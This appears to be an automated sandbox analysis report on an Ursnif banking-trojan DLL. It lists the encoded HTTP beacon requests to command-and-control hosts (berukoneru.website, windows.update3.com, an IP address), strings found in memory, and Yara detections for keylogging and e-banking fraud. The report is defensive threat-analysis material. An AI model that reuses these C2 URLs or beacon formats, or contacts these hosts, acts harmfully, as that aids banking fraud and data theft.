Source: global traffic | HTTP traffic detected: GET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
Source: global traffic | HTTP traffic detected: GET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
            Source: 6.dll | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: 6.dll | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
            Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: 6.dll | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
            Source: loaddll32.exe, 00000000.00000003.522936760.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317739016.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.686994186.0000000001344000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.337960981.0000000003382000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316290862.0000000003383000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.338394833.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.397630801.000001497A51A000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.400300965.000001497A51A000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.400801988.000001497A51A000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: 6.dll | String found in binary or memory: http://crl.globalsign.net/root.crl0
            Source: 6.dll | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: 6.dll | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: 6.dll | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: 6.dll | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: 6.dll | String found in binary or memory: http://ocsp.digicert.com0C
            Source: 6.dll | String found in binary or memory: http://ocsp.digicert.com0N
            Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: 6.dll | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
            Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: loaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmp | String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
            Source: loaddll32.exe, 00000000.00000003.317624845.0000000001398000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316267329.00000000033D1000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.316701420.00000000008F1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmp | String found in binary or memory: https://aka.ms/MicrosoftEdgeDownload&quot;
            Source: rundll32.exe, 00000004.00000003.338607112.0000000000FF3000.00000004.00000001.sdmp | String found in binary or memory: https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.html
            Source: rundll32.exe, 00000003.00000003.364039010.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.372813489.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.523369955.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/
            Source: regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/BS
            Source: rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp | String found in binary or memory: https://berukoneru.website/LAp
            Source: rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/O
            Source: regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/j
            Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363514151.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/jP
            Source: regsvr32.exe, 00000002.00000003.362160768.00000000033C0000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9on
            Source: rundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHY
            Source: rundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP7
            Source: loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCA
            Source: regsvr32.exe, 00000002.00000003.362615512.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/65
            Source: regsvr32.exe, 00000002.00000003.372829342.000000000335B000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL
            Source: rundll32.exe, 00000003.00000003.362882057.00000000008D7000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/tyi
            Source: rundll32.exe, 00000004.00000003.372839349.0000000000FF2000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website:443/tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6
            Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website:443/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQ
            Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmp | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xdax&quot;
            Source: 6.dll | String found in binary or memory: https://nodejs.org0
            Source: loaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmp | String found in binary or memory: https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css
            Source: regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp | String found in binary or memory: https://windows.update3.com/
            Source: regsvr32.exe, 00000002.00000003.361178760.000000000335B000.00000004.00000001.sdmp | String found in binary or memory: https://windows.update3.com/tire/clW2f_2FhATNrnqvBey5XJ/HMTv6hdufnhb6/_2BVSemT/sKeyn9puL2fpAeyTFFwZv
            Source: rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp | String found in binary or memory: https://windows.update3.com/tire/h5hri2qU3j_2/FtKGoeU1cGb/_2B9_2FVlXXJXe/pIon3PPVjwV3l856n6O1d/JfgtT
            Source: 6.dll | String found in binary or memory: https://www.digicert.com/CPS0
            Source: 6.dll | String found in binary or memory: https://www.globalsign.com/repository/0
            Source: 6.dll | String found in binary or memory: https://www.globalsign.com/repository/03
            Source: unknown | DNS traffic detected: queries for: windows.update3.com
            Source: global traffic | HTTP traffic detected: GET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49795 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49796 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49797 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49798 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49799 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49801 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49802 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49803 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49805 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49806 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49807 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49808 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara match | File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

            E-Banking Fraud:

            Yara detected Ursnif
            Source: Yara match | File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
